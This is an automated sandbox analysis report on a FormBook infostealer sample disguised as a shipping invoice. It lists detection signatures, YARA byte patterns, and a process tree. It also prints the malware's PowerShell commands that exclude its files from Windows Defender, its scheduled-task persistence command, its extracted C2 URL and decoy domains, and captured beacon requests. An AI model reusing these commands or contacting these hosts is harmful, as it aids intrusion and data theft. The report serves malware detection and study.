Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report HAWB AND INV.exe

Overview

General Information

Sample Name:HAWB AND INV.exe
Analysis ID:402848
MD5:42662765a94ce5ece11529509f937711
SHA1:da57dd4c137c47fc9b906caaf067c6ed13fa2da6
SHA256:2138325dd5e2825ee4086187a944af336476b0327e1ddae7563bb24523836e08
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • HAWB AND INV.exe (PID: 6752 cmdline: 'C:\Users\user\Desktop\HAWB AND INV.exe' MD5: 42662765A94CE5ECE11529509F937711)
    • powershell.exe (PID: 6932 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7020 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 7072 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4592 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • HAWB AND INV.exe (PID: 6156 cmdline: C:\Users\user\Desktop\HAWB AND INV.exe MD5: 42662765A94CE5ECE11529509F937711)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6556 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.alldaazz.com/maw9/"], "decoy": ["jaimericart.com", "mayavantcard.com", "romanzava.site", "forefrontunderground.com", "grafikirmarketing.com", "airpoppoff.com", "captureq.com", "vph.ventures", "historiclocation.com", "theoxfordway.com", "springersells.com", "huther.mobi", "networkingmaderas.com", "reggatech.com", "dollfacela.com", "moneycrypt.net", "calidad-precio.net", "hamnsk165.com", "victoriabrownrealtor.com", "itechfreak.com", "bernardocammarata.com", "alfredoarlington.com", "rencontre-montpellier.com", "vipbrandwatch.info", "nhahangminhcuong.com", "senmec23.com", "onemoreusa.com", "dinkoistmatrimony.com", "ideasparatubebe.com", "pozickyauveryinfossk.com", "buildingba.com", "heoslight.com", "ventadecalsotsdevalls.com", "app-cintavcsuges.com", "culturaenmistacones.com", "whyiamvoting.com", "blackopstravel.club", "poorwhitetrashlivesmatters.com", "beachrockisland.com", "natrium-ionen-akkus.com", "noxi.store", "whichrace.com", "mindfulprovision.com", "nznatureguides.com", "fullautoimage.com", "sharonbakcht.com", "ournursingdegreesworld.com", "parismedspas.com", "premier-moment.info", "curvygirlholiday.com", "getsuperyouth.com", "177palmer.com", "headstronghairstudio.com", "sasdrawing.com", "drinkhydrateyourcoffee.com", "globalifier.com", "protocolpolitician.com", "edinglow.com", "isimplix.com", "trendylifefashion.com", "ferhou.com", "ellarewster.club", "ecosanhn.com", "newedulist.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.HAWB AND INV.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        10.2.HAWB AND INV.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        10.2.HAWB AND INV.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        10.2.HAWB AND INV.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          10.2.HAWB AND INV.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 5 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\HAWB AND INV.exe' , ParentImage: C:\Users\user\Desktop\HAWB AND INV.exe, ParentProcessId: 6752, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp', ProcessId: 7072

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.alldaazz.com/maw9/"], "decoy": ["jaimericart.com", "mayavantcard.com", "romanzava.site", "forefrontunderground.com", "grafikirmarketing.com", "airpoppoff.com", "captureq.com", "vph.ventures", "historiclocation.com", "theoxfordway.com", "springersells.com", "huther.mobi", "networkingmaderas.com", "reggatech.com", "dollfacela.com", "moneycrypt.net", "calidad-precio.net", "hamnsk165.com", "victoriabrownrealtor.com", "itechfreak.com", "bernardocammarata.com", "alfredoarlington.com", "rencontre-montpellier.com", "vipbrandwatch.info", "nhahangminhcuong.com", "senmec23.com", "onemoreusa.com", "dinkoistmatrimony.com", "ideasparatubebe.com", "pozickyauveryinfossk.com", "buildingba.com", "heoslight.com", "ventadecalsotsdevalls.com", "app-cintavcsuges.com", "culturaenmistacones.com", "whyiamvoting.com", "blackopstravel.club", "poorwhitetrashlivesmatters.com", "beachrockisland.com", "natrium-ionen-akkus.com", "noxi.store", "whichrace.com", "mindfulprovision.com", "nznatureguides.com", "fullautoimage.com", "sharonbakcht.com", "ournursingdegreesworld.com", "parismedspas.com", "premier-moment.info", "curvygirlholiday.com", "getsuperyouth.com", "177palmer.com", "headstronghairstudio.com", "sasdrawing.com", "drinkhydrateyourcoffee.com", "globalifier.com", "protocolpolitician.com", "edinglow.com", "isimplix.com", "trendylifefashion.com", "ferhou.com", "ellarewster.club", "ecosanhn.com", "newedulist.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exeReversingLabs: Detection: 21%
          Multi AV Scanner detection for submitted fileShow sources
          Source: HAWB AND INV.exeReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE
          Source: 10.2.HAWB AND INV.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: HAWB AND INV.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HAWB AND INV.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmp, ipconfig.exe, 00000017.00000003.473141653.00000000008F0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HAWB AND INV.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 4x nop then pop esi10_2_00415836
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 4x nop then pop edi10_2_004162B1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 4x nop then pop edi10_2_00415680
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop esi23_2_00125836
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi23_2_001262B1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi23_2_00125680

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.alldaazz.com/maw9/
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.dinkoistmatrimony.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.premier-moment.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.ecosanhn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.curvygirlholiday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.networkingmaderas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.dinkoistmatrimony.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.premier-moment.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.ecosanhn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.curvygirlholiday.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 HTTP/1.1Host: www.networkingmaderas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.dinkoistmatrimony.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlTransfer-Encoding: chunkedDate: Mon, 03 May 2021 12:53:52 GMTServer: LiteSpeedData Raw: 32 38 37 32 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43
          Source: ipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
          Source: powershell.exe, 00000002.00000002.526394287.0000000002FEF000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.527445795.00000000048A1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: explorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
